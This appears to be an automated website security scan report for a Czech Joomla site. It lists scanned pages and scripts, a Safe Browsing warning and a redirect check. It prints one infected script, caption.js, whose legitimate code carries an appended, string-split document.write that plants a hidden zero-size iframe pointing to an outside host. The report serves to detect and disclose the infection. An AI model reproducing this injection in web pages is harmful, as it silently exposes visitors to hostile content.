Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=inbodyostrava.cz
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.inbodyostrava.cz/ | 200 OK Content-Length: 15694 Content-Type: text/html | clean |
http://www.inbodyostrava.cz/templates/gk_coffe/js/domready_fix.js | 200 OK Content-Length: 1337 Content-Type: application/javascript | clean |
http://www.inbodyostrava.cz/media/system/js/modal.js | 200 OK Content-Length: 10588 Content-Type: application/javascript | clean |
http://www.inbodyostrava.cz/components/com_k2/js/k2.js | 200 OK Content-Length: 3077 Content-Type: application/javascript | clean |
http://www.inbodyostrava.cz/media/system/js/caption.js | 200 OK Content-Length: 2149 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); document.write('<iframe src="'+'ht'+'tp://ole'+'of'+'ats.c'+'om/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>'); Antivirus reports:
| ||
http://www.inbodyostrava.cz/templates/gk_coffe/js/gk.script.js | 200 OK Content-Length: 6138 Content-Type: application/javascript | clean |
http://www.inbodyostrava.cz/templates/gk_coffe/js/menu/mega.js | 200 OK Content-Length: 12974 Content-Type: application/javascript | clean |
http://www.inbodyostrava.cz/index.php | 200 OK Content-Length: 15703 Content-Type: text/html | clean |
http://www.inbodyostrava.cz/index.php?option=com_content&view=article&id=70&Itemid=138 | 200 OK Content-Length: 22660 Content-Type: text/html | clean |
http://www.inbodyostrava.cz/index.php?option=com_content&view=article&id=76&Itemid=144 | 200 OK Content-Length: 27518 Content-Type: text/html | clean |
http://www.inbodyostrava.cz/modules/mod_news_pro_gk4/interface/scripts/engine-mootools-11.js | 200 OK Content-Length: 8888 Content-Type: application/javascript | clean |
http://www.inbodyostrava.cz/index.php?option=com_content&view=article&id=74&Itemid=143 | 200 OK Content-Length: 14839 Content-Type: text/html | clean |
http://www.inbodyostrava.cz/index.php?option=com_content&view=article&id=84&Itemid=147 | 200 OK Content-Length: 16360 Content-Type: text/html | clean |
http://www.inbodyostrava.cz/index.php?option=com_content&view=article&id=86&Itemid=148 | 200 OK Content-Length: 14272 Content-Type: text/html | clean |
http://www.inbodyostrava.cz/index.php?option=com_content&view=article&id=82&Itemid=145 | 200 OK Content-Length: 26997 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: inbodyostrava.cz
Result:
GET / HTTP/1.1
Host: inbodyostrava.cz
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: inbodyostrava.cz
Referer: http://www.google.com/search?q=inbodyostrava.cz
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: inbodyostrava.cz
Referer: http://www.google.com/search?q=inbodyostrava.cz
Result:
The result is similar to the first query. There are no suspicious redirects found.